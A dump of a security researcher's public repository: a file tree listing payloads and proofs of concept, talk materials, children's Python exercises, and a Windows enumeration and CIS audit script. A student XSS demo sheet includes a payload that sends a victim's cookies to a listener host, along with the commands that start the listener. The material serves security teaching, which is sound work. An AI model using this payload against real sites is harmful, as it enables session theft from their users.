├── .gitattributes
├── .gitignore
├── Attacking Damn Vulnerable Web Services.pdf
├── Exploiting Local File Inclusion using PHP Wrappers.pdf
├── Finding SQL Injection vulnerabilities using polyglot payloads.pdf
├── Ganglia-Web-3.7.2-XSS-Disclosure.pdf
├── Old Presentations
    ├── Bsides London 2014
    │   └── Teaching Kids Programming and Cyber Security.pez
    ├── MWRICON 2018
    │   ├── Attacking AngularJS Applications Workshop Content.pdf
    │   ├── README.md
    │   └── angulartrainingapplication.zip
    ├── SHU Hacksoc
    │   ├── Uni Open day
    │   │   └── beef-university open day demo.pptx
    │   ├── xss dem sheet for students.txt
    │   └── xss primer- snoopy security (2).ppt
    ├── Steelcon 2014
    │   ├── Banana Skeleton.sb
    │   ├── Lesson Plan 1.docx
    │   ├── Lesson Plan Template lesson 2.docx
    │   ├── Potential Software For Teaching.docx
    │   ├── [WIP] Week 1 Lesson Plan.docx
    │   ├── links to resources.pdf
    │   └── tutorial1-lets walk our pets.pdf
    ├── Steelcon 2015
    │   ├── code
    │   │   ├── 01.gradexercise.py
    │   │   ├── 02.rockpaperscissors.py.rockpapersci
    │   │   ├── 03.guessthenumber.py
    │   │   ├── 04. calculator.py.py
    │   │   ├── 05.calculator2.py.py
    │   │   ├── pygame_ball.py.txt
    │   │   └── snake.py.py
    │   └── programing arcade games with python.ppt
    ├── Steelcon 2016
    │   ├── Creating Android Apps using App Inventor.pptx
    │   └── saved project files
    │   │   ├── flappybird.aia
    │   │   ├── guessthenumber.aia
    │   │   ├── hello_word.aia
    │   │   ├── movingball.aia
    │   │   ├── paddle.png
    │   │   ├── pong.aia
    │   │   └── text_to_speech_copy.aia
    └── readme.md
├── Scripts and pocs
    ├── CIS-Checks.ps1
    ├── CVE-2017-12617.sh
    ├── Clickjacking poc.html
    ├── Elibyy-Zip.php
    ├── URlSchemes.txt
    ├── alchemy_zippy.php
    ├── bapp_store_scraper.py
    ├── bluemonday_server.go
    ├── burpstarter.sh
    ├── cis-checks.ps1
    ├── comodo.php
    ├── csrf from xss POC
    ├── csrf_form.html
    ├── d2p.py
    ├── darious_zipper.php
    ├── datauri.txt
    ├── extractor_poc.php
    ├── ghostwriter_localfileaccess_poc.html
    ├── ghostwriterxsstolocalfileaccess.html
    ├── imgtragick.jpg
    ├── installvulnserver.ps1
    ├── iplist.sh
    ├── laravel_zip.php
    ├── madzipper.php
    ├── main.rs
    ├── main.swift
    ├── method-enumerator.sh
    ├── old_pcl_zip.php
    ├── pcl_zip.php
    ├── php_archive.php
    ├── php_zip.php
    ├── preview.gif
    ├── pyserver.py
    ├── s3bucket_poc.sh
    ├── server.go
    ├── setup-SPartan.sh
    ├── shellshockpoc.py
    ├── smuggle.py
    ├── swffuzz.txt
    ├── test.html
    ├── test.swift
    ├── token.py
    ├── uri-schemes-1.csv
    ├── vpnsoft_unzip.php
    ├── windowsappproxy.bat
    ├── wordlist_sorter.sh
    ├── xmlrpcbruteforce.sh
    ├── zeta_archive.php
    ├── ziparchiveex.php
    └── zipstream.php
├── blog archive
    ├── 1.png
    ├── 2.png
    ├── 2015-04-12-Exploiting_Local_File_Inclusion_using_PHP_Wrappers.md
    ├── 2015-05-25-Content Provider Injection.md
    ├── 2015-05-25-Exploiting SSRF using SSRF-Proxy.md
    ├── 2015-08-25-ZAP-Scripting.markdown
    ├── 2015-09-01-Burpsuite-Tips-Tricks-Extensions.markdown
    ├── 2015-09-28-SSI-Injection.markdown
    ├── 2015-10-23-six-things-you-didnt-know-Drozer-could-do.md
    ├── 2016-04-21-DVWS-Walkthrough_guide.md
    ├── 3.png
    ├── about.html
    ├── contact.html
    ├── images
    │   ├── 1.JPG
    │   └── readme.md
    └── index.html
├── cheatsheets
    ├── blue-team-level1.md
    ├── chrome.txt
    └── i3.md
├── ctf writeups
    ├── 2014-09-01-ISC-Challenge-2014.markdown
    ├── 2014-10-24-google-xss-challenge.md
    ├── 2015-01-11-C-Sharp-VulnSoap.markdown
    ├── 2015-02-20-TopHatSec-Freshly.markdown
    ├── 2015-02-20-TopHatSec-Zors.markdown
    ├── 2015-07-21-infosec-institute-ctf-solutions.md
    ├── 2016-07-26-ABCTF-L33t-H4xx0r-2016.markdown
    └── 2016-07-26-ABCTF-Reunion-2016.markdown
├── dotfiles
    ├── i3
    │   └── config
    └── tmux
    │   └── tmux.conf
├── dvws
    ├── IDOR1.png
    ├── IDOR2.png
    ├── IDOR3.png
    ├── apiexposure.png
    ├── cmdi.png
    ├── content-type-xss.png
    ├── content-type-xss2.png
    ├── cors.png
    ├── csti.png
    ├── cxss-xml1.png
    ├── cxss-xml2.png
    ├── dvws.png
    ├── info_disclosure.png
    ├── json-hijacking1.png
    ├── jwt2.png
    ├── jwt3.png
    ├── jwt4.png
    ├── mass_assignment.png
    ├── nosqlinjection.png
    ├── nosqlinjection2.png
    ├── postmessage.png
    ├── postmessage1.png
    ├── pp1.png
    ├── pp2.png
    ├── pt.png
    ├── readme.md
    ├── sqlinjection.png
    ├── sqlinjection1.png
    ├── sqlinjection3.png
    ├── xmlxss.png
    ├── xpath1.png
    ├── xpath2.png
    └── xpath3.png
├── evil.tar.gz
├── patches
    ├── CVE-2019-10787-im-resize.patch
    ├── CVE-2019-10788-im-metadata.patch
    ├── CVE-2020-7749.patch
    ├── Chumper-Zipper-Zip-Slip.patch
    ├── DariousIII-Zipper-Zip-Slip.patch
    ├── SNYK-JS-UTILSEXTEND-560385.patch
    ├── dompurify.txt
    ├── lodash_0_0_20200429_6baae67d501e4c45021280876d42efe351e77551.patch
    ├── madzipper-Zip-Slip.patch
    └── python-markdown-editor-xss.patch
├── payloads
    ├── 1000commonpasswords.txt
    ├── alert.js
    ├── crlf.txt
    ├── csvinjection.txt
    ├── electron.js
    ├── electronxsspayloads
    ├── evil.tar.gz
    ├── evil.zip
    ├── foo.xml
    ├── hrefpayloads.txt
    ├── info.txt
    ├── log4j.txt
    ├── mk.txt
    ├── php-grep
    ├── php_dangerous.txt
    ├── pickle.py
    ├── ptcurl.txt
    ├── sharepointwordlist.txt
    ├── shell.js
    ├── shell.phar
    ├── shell.zip
    ├── shell2.js
    ├── shell3.js
    ├── sqli_timebased.txt
    ├── testsvg.svg
    ├── tinyphpshell.txt
    ├── xss.html
    ├── xsspayloads.txt
    ├── xsssvg.svg
    └── xxe.xml
├── phppgadmin CSRF Vulnerability.pdf
└── playground
    ├── DeserializeConsoleApp.cs
    ├── fuzz.go
    └── fuzz.sh


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # Windows shortcuts
18 | *.lnk
19 | 
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 | 
24 | # OSX
25 | # =========================
26 | 
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear on external disk
35 | .Spotlight-V100
36 | .Trashes
37 | 
38 | # Directories potentially created on remote AFP share
39 | .AppleDB
40 | .AppleDesktop
41 | Network Trash Folder
42 | Temporary Items
43 | .apdisk
44 | 


--------------------------------------------------------------------------------
/Attacking Damn Vulnerable Web Services.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Attacking Damn Vulnerable Web Services.pdf


--------------------------------------------------------------------------------
/Exploiting Local File Inclusion using PHP Wrappers.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Exploiting Local File Inclusion using PHP Wrappers.pdf


--------------------------------------------------------------------------------
/Finding SQL Injection vulnerabilities using polyglot payloads.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Finding SQL Injection vulnerabilities using polyglot payloads.pdf


--------------------------------------------------------------------------------
/Ganglia-Web-3.7.2-XSS-Disclosure.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Ganglia-Web-3.7.2-XSS-Disclosure.pdf


--------------------------------------------------------------------------------
/Old Presentations/Bsides London 2014/Teaching Kids Programming and Cyber Security.pez:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Bsides London 2014/Teaching Kids Programming and Cyber Security.pez


--------------------------------------------------------------------------------
/Old Presentations/MWRICON 2018/Attacking AngularJS Applications Workshop Content.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/MWRICON 2018/Attacking AngularJS Applications Workshop Content.pdf


--------------------------------------------------------------------------------
/Old Presentations/MWRICON 2018/README.md:
--------------------------------------------------------------------------------
 1 | #### Attacking AngularJS Applications
 2 | 
 3 | The modern web application development ecosystem has changed significantly over the last few years with the emergence of front-end frameworks. Moreover, front-end JavaScript frameworks such as AngularJS brings new functionality and features to a web application. However, AngularJS can often bring additional attack surface to an already secure application. This workshop will look at the security aspects of AngularJS applications and give the attendee a thorough introduction to finding and exploiting Angular specific vulnerabilities. This workshop consists of the following topics:
 4 | 
 5 | * Introduction to AngularJS
 6 | * Cross Site-Scripting and AngularJS
 7 | * Template Injection
 8 | * Sandbox Bypasses
 9 | * Local Storage
10 | * Cross-Site Request Forgery and JSON Hijacking
11 | * Client Side routing and Authorisation Issues
12 | 
13 | Attendees are welcome to participate through the workshop by having access to a vulnerable application. Access to all tools and examples demonstrated on the day will be provided. The duration of the workshop will be 1 hour 45 minutes. Attendees wishing to participate are required to bring the following:
14 | *	Laptop with 32/64-bit operating system with at least 4 GB RAM, 15 GB free hard drive space, USB port (2.0 or 3.0), and administrative access
15 | *	Internet Explorer 8 (Only needed for one exercise). Can be obtained through here: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
16 | *	Motivation to listen to us while we talk 
17 | 
18 | Resources required from MWR
19 | *	Laptop Projector
20 | *	10-12 USB sticks (ppleaseeee) to distribute the vulnerable application/vm (Will return it)
21 | 
22 | Maximum number of participants
23 | * 15
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/Old Presentations/MWRICON 2018/angulartrainingapplication.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/MWRICON 2018/angulartrainingapplication.zip


--------------------------------------------------------------------------------
/Old Presentations/SHU Hacksoc/Uni Open day/beef-university open day demo.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/SHU Hacksoc/Uni Open day/beef-university open day demo.pptx


--------------------------------------------------------------------------------
/Old Presentations/SHU Hacksoc/xss dem sheet for students.txt:
--------------------------------------------------------------------------------
 1 | XSS Primer-------------------------------------------------------------------
 2 | 
 3 | 
 4 | Links: http://jsfiddle.net/
 5 | 
 6 | 
 7 | Demo 01 (XSS Example) = http://www.live.bbc.co.uk/corporate2/privacy?source_tld=
 8 | 
 9 | Demo 02 (DOM XSS) = http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=80+80
10 | 
11 | Demo 03 (HTML Conext) = https://public-firing-range.appspot.com/reflected/parameter/head?q=a
12 | 
13 | Demo 04 (attribute 1) = http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=&password=
14 | 
15 | Demo 05 (attribute 2) = https://public-firing-range.appspot.com/reflected/parameter/iframe_attribute_value?q=
16 | 
17 | Demo 05 (Script context) =  https://public-firing-range.appspot.com/reflected/parameter/js_singlequoted_string?q=a
18 | 
19 | Demo 06 (URL Context) = http://public-firing-range.appspot.com/reflected/url/href?q=
20 | 
21 | Demo 07 (Style Context) = https://public-firing-range.appspot.com/reflected/parameter/css_style?q=body{xss:expression%28alert%281%29%29}
22 | The above only works in IE
23 | 
24 | Demo 08 (Example of a WAF = http://waf.ptest.cudasvc.com/cgi-mod/index.cgi
25 | 
26 | Filter Evasion Links--------------------------
27 | https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
28 | http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html
29 | http://n0p.net/penguicon/php_app_sec/mirror/xss.html
30 | 
31 | 
32 | Demo 09 = http://jsfiddle.net/vh4em6o2/
33 | 
34 | Demo 10 (Need to download vms first)
35 | 
36 | Attack Payload = <script>var i = new Image();i.src="http://192.168.0.3:8000/gimmie.html?cookie="+document.cookie</script>
37 | 
38 | Listener
39 | 
40 | If Python2, then = python –m SimpleHTTPServer 8000
41 | If Python3, then = python -m http.server  8000
42 | 
43 | More cool XSS payloads:http://www.xss-payloads.com/
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/Old Presentations/SHU Hacksoc/xss primer- snoopy security (2).ppt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/SHU Hacksoc/xss primer- snoopy security (2).ppt


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/Banana Skeleton.sb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/Banana Skeleton.sb


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/Lesson Plan 1.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/Lesson Plan 1.docx


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/Lesson Plan Template lesson 2.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/Lesson Plan Template lesson 2.docx


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/Potential Software For Teaching.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/Potential Software For Teaching.docx


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/[WIP] Week 1 Lesson Plan.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/[WIP] Week 1 Lesson Plan.docx


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/links to resources.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/links to resources.pdf


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2014/tutorial1-lets walk our pets.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2014/tutorial1-lets walk our pets.pdf


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/01.gradexercise.py:
--------------------------------------------------------------------------------
 1 | name = raw_input('Enter your name:')
 2 | score = raw_input('Enter your Math grade:')
 3 | 
 4 | score = float(score)
 5 | 
 6 | print 'Hello', name
 7 | 
 8 | if score > 1.0 or score < 0.0:
 9 |     print 'Bad score'
10 | elif score > 0.9:
11 |     print 'A'
12 | elif score > 0.8:
13 |     print 'B'
14 | elif score > 0.7:
15 |     print 'C'
16 | elif score > 0.6:
17 |     print 'D'
18 | else:
19 |     print 'F'


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/02.rockpaperscissors.py.rockpapersci:
--------------------------------------------------------------------------------
 1 | import random
 2 | 
 3 | 
 4 | 
 5 | print 'Welcome to Rock,Paper, Scissors'
 6 | yourchoice = raw_input('Rock, Paper or Scissors:')
 7 | 
 8 | computer = ['Rock', 'Paper', 'Scissors']
 9 | computerchoice = (random.choice(computer))
10 | print 'Computer chose ' + computerchoice 
11 | 
12 | 
13 | if yourchoice == computerchoice:
14 |     print 'Its a Draw!' 
15 | elif yourchoice == 'Rock' and computerchoice == 'Paper':
16 |     print 'Computer Wins' 
17 | elif yourchoice == 'Rock' and computerchoice == 'Scissors':
18 |     print 'You Win' 
19 | elif yourchoice == 'Paper' and computerchoice == 'Rock':
20 |     print 'You Win' 
21 | elif yourchoice == 'Paper' and computerchoice == 'Scissors':
22 |     print 'You Lose' 
23 | elif yourchoice == 'Rock' and computerchoice == 'Scissors':
24 |     print 'You Wins' 
25 | elif yourchoice == 'Rock' and computerchoice == 'Paper':
26 |     print 'Computer Wins' 
27 |     
28 | 


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/03.guessthenumber.py:
--------------------------------------------------------------------------------
 1 | # This is a guess the number game.
 2 | import random
 3 | 
 4 | guessesTaken = 0
 5 | 
 6 | 
 7 | 
 8 | number = random.randint(1, 10)
 9 | 
10 | 
11 | print('Well, I am thinking of a number between 1 and 10.')
12 | 
13 | while guessesTaken < 6:
14 |     print('Take a guess.') # There are four spaces in front of print.
15 |     guess = input()
16 |     guess = float(guess)
17 | 
18 |     guessesTaken = guessesTaken + 1
19 | 
20 |     if guess < number:
21 |         print('Your guess is too low.') # There are eight spaces in front of print.
22 | 
23 |     if guess > number:
24 |         print('Your guess is too high.')
25 | 
26 |     if guess == number:
27 |         break
28 | 
29 | if guess == number:
30 |     guessesTaken = str(guessesTaken)
31 |     print('Good job, You guessed my number in ' + guessesTaken + ' guesses!')
32 | 
33 | if guess != number:
34 |     number = str(number)
35 |     print('Nope. The number I was thinking of was ' + number)


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/04. calculator.py.py:
--------------------------------------------------------------------------------
 1 | #My first program in Python. Im still learning this programing language.
 2 | 
 3 | running = True 
 4 | 
 5 | while running:
 6 |     print("1 = Addition")
 7 |     print("2 = Subtraction")
 8 |     print("3 = Multiplication")
 9 |     print("4 = Division")
10 |     print("5 = Exit program")
11 |     cmd = int(input("Enter number : "))
12 |     if cmd == 1:
13 |         print("Addition")
14 |         first = int(input("Enter first number :"))
15 |         secund = int(input("Enter secund number :"))
16 |         result = first + secund
17 |         print(first ,'+' ,secund ,'=' , result)
18 |     elif cmd == 2:
19 |         print("Subtraction")
20 |         first = int(input("Enter first number :"))
21 |         secund = int(input("Enter secund number :"))
22 |         result = first - secund
23 |         print(first ,"-" ,secund ,"=" , result)
24 |     elif cmd == 3:
25 |         print("Mmltiplication")
26 |         first = int(input("Enter first number :"))
27 |         secund = int(input("Enter secund number :"))
28 |         result = first * secund
29 |         print(first ,"*" ,secund ,"=" , result)
30 |     elif cmd == 4:
31 |         print("Division")
32 |         first = int(input("Enter first number :"))
33 |         secund = int(input("Enter secund number :"))
34 |         result = first / secund
35 |         print(first ,"/" ,secund ,"=" , result)
36 |     elif cmd == 5:
37 |         print("Quit!")
38 |         running = False


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/05.calculator2.py.py:
--------------------------------------------------------------------------------
 1 | 
 2 | def addition(num1,num2): 
 3 |     answer = num1 + num2
 4 |     return answer
 5 | 
 6 | def subtraction(num1,num2): 
 7 |     answer = num1 - num2
 8 |     return answer
 9 | 
10 | def division(num1,num2): 
11 |     answer = num1 / num2
12 |     return answer
13 | 
14 | def multiplication(num1,num2): 
15 |     answer = num1 / num2
16 |     return answer
17 | 
18 | 
19 | 
20 | print('1 = Addition')
21 | print('2 = Subtraction')
22 | print('3 = Division')
23 | print('4 = Multiplication')
24 | 
25 | choice = int(raw_input('Pick Your  choice'))
26 | num1 = int(raw_input('What is your first number'))
27 | num2 = int(raw_input('What is your second number'))
28 | 
29 | if choice == 1:
30 |     answer = addition(num1,num2)
31 |     print 'The result is ', answer
32 | elif choice ==2:
33 |     answer =  subtraction(num1,num2)
34 |     print 'The result is ', answer
35 | elif choice ==3:
36 |     multiplication(num1,num2)
37 |     print 'The result is ', answer
38 | elif choice ==4:
39 |     answer = division(num1,num2)
40 |     print 'The result is ', answer
41 |       
42 | 
43 | 
44 | 
45 | 
46 | 
47 | 
48 | 
49 | 


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/pygame_ball.py.txt:
--------------------------------------------------------------------------------
 1 | import sys, pygame
 2 | pygame.init()
 3 | 
 4 | size = width, height = 320, 240
 5 | speed = [2, 2]
 6 | black = 0, 0, 0
 7 | 
 8 | screen = pygame.display.set_mode(size)
 9 | 
10 | ball = pygame.image.load("ball.bmp")
11 | ballrect = ball.get_rect()
12 | 
13 | while 1:
14 | 	for event in pygame.event.get():
15 | 		if event.type == pygame.QUIT: sys.exit()
16 | 			ballrect = ballrect.move(speed)
17 | 			if ballrect.left < 0 or ballrect.right > width:
18 |           			speed[0] = -speed[0]
19 | 	       		 if ballrect.top < 0 or ballrect.bottom > height:
20 | 	          		speed[1] = -speed[1]
21 | 
22 | 	 screen.fill(black)
23 |          screen.blit(ball, ballrect)
24 |       	 pygame.display.flip()


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/code/snake.py.py:
--------------------------------------------------------------------------------
 1 | import pygame, random, sys
 2 | from pygame.locals import *
 3 | def collide(x1, x2, y1, y2, w1, w2, h1, h2):
 4 | 	if x1+w1>x2 and x1<x2+w2 and y1+h1>y2 and y1<y2+h2:return True
 5 | 	else:return False
 6 | def die(screen, score):
 7 | 	f=pygame.font.SysFont('Arial', 30);t=f.render('Your score was: '+str(score), True, (0, 0, 0));screen.blit(t, (10, 270));pygame.display.update();pygame.time.wait(2000);sys.exit(0)
 8 | xs = [290, 290, 290, 290, 290];ys = [290, 270, 250, 230, 210];dirs = 0;score = 0;applepos = (random.randint(0, 590), random.randint(0, 590));pygame.init();s=pygame.display.set_mode((600, 600));pygame.display.set_caption('Snake');appleimage = pygame.Surface((10, 10));appleimage.fill((0, 255, 0));img = pygame.Surface((20, 20));img.fill((255, 0, 0));f = pygame.font.SysFont('Arial', 20);clock = pygame.time.Clock()
 9 | while True:
10 | 	clock.tick(10)
11 | 	for e in pygame.event.get():
12 | 		if e.type == QUIT:
13 | 			sys.exit(0)
14 | 		elif e.type == KEYDOWN:
15 | 			if e.key == K_UP and dirs != 0:dirs = 2
16 | 			elif e.key == K_DOWN and dirs != 2:dirs = 0
17 | 			elif e.key == K_LEFT and dirs != 1:dirs = 3
18 | 			elif e.key == K_RIGHT and dirs != 3:dirs = 1
19 | 	i = len(xs)-1
20 | 	while i >= 2:
21 | 		if collide(xs[0], xs[i], ys[0], ys[i], 20, 20, 20, 20):die(s, score)
22 | 		i-= 1
23 | 	if collide(xs[0], applepos[0], ys[0], applepos[1], 20, 10, 20, 10):score+=1;xs.append(700);ys.append(700);applepos=(random.randint(0,590),random.randint(0,590))
24 | 	if xs[0] < 0 or xs[0] > 580 or ys[0] < 0 or ys[0] > 580: die(s, score)
25 | 	i = len(xs)-1
26 | 	while i >= 1:
27 | 		xs[i] = xs[i-1];ys[i] = ys[i-1];i -= 1
28 | 	if dirs==0:ys[0] += 20
29 | 	elif dirs==1:xs[0] += 20
30 | 	elif dirs==2:ys[0] -= 20
31 | 	elif dirs==3:xs[0] -= 20	
32 | 	s.fill((255, 255, 255))	
33 | 	for i in range(0, len(xs)):
34 | 		s.blit(img, (xs[i], ys[i]))
35 | 	s.blit(appleimage, applepos);t=f.render(str(score), True, (0, 0, 0));s.blit(t, (10, 10));pygame.display.update()
36 | 					
37 | 					
38 | 			
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/programing arcade games with python.ppt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2015/programing arcade games with python.ppt


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/Creating Android Apps using App Inventor.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/Creating Android Apps using App Inventor.pptx


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/flappybird.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/flappybird.aia


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/guessthenumber.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/guessthenumber.aia


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/hello_word.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/hello_word.aia


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/movingball.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/movingball.aia


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/paddle.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/paddle.png


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/pong.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/pong.aia


--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/text_to_speech_copy.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/text_to_speech_copy.aia


--------------------------------------------------------------------------------
/Old Presentations/readme.md:
--------------------------------------------------------------------------------
1 | 
2 | ### Presentations from 2014 - 2016


--------------------------------------------------------------------------------
/Scripts and pocs/CIS-Checks.ps1:
--------------------------------------------------------------------------------
  1 | function enumeration
  2 | {
  3 |   # List OS Version
  4 |   systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  
  5 |   # Hostname of the System
  6 |   hostname  
  7 |   # List all services
  8 |   Get-WmiObject -Class win32_service
  9 |   # List all users
 10 |   net users
 11 |   # Available Network Interfaces and route
 12 |   ipconfig /all
 13 |   route print
 14 |   arp -A
 15 |   # Active network connections
 16 |   netstat -ano
 17 |   netsh firewall show state
 18 |   netsh firewall show config
 19 |   # Show all scheduled tasks
 20 |   schtasks /query /fo LIST /v
 21 |   # Show services and process IDs
 22 |   tasklist /SVC
 23 |   netstart
 24 |   # Show 3rd Party Drivers
 25 |   DRIVERQUERY
 26 | }
 27 | 
 28 | function patches
 29 | {
 30 |   get-hotfix | select Caption,Description,HotFixID,InstalledOn
 31 |   
 32 | }
 33 | 
 34 | function cis-checks
 35 | {
 36 | 
 37 | "----------------------------------------"
 38 | "Password Policy checks, "
 39 | "----------------------------------------"
 40 | "net accounts"
 41 | net accounts
 42 | "REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network" 
 43 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network 
 44 | "REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters"
 45 | REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters 
 46 | "Passwords Should Be Stored Securely"
 47 | "REG QUERY HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel"
 48 | REG QUERY HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel
 49 | "Checking if Account Lockout Registry is set"
 50 | "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout"
 51 | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout
 52 | 
 53 | "----------------------------------------"
 54 | "Account auditing"
 55 | "----------------------------------------"
 56 | "User Logons and Logoffs Audited"
 57 | auditpol /get /subcategory:"Logoff"
 58 | auditpol /get /subcategory:"Logon"
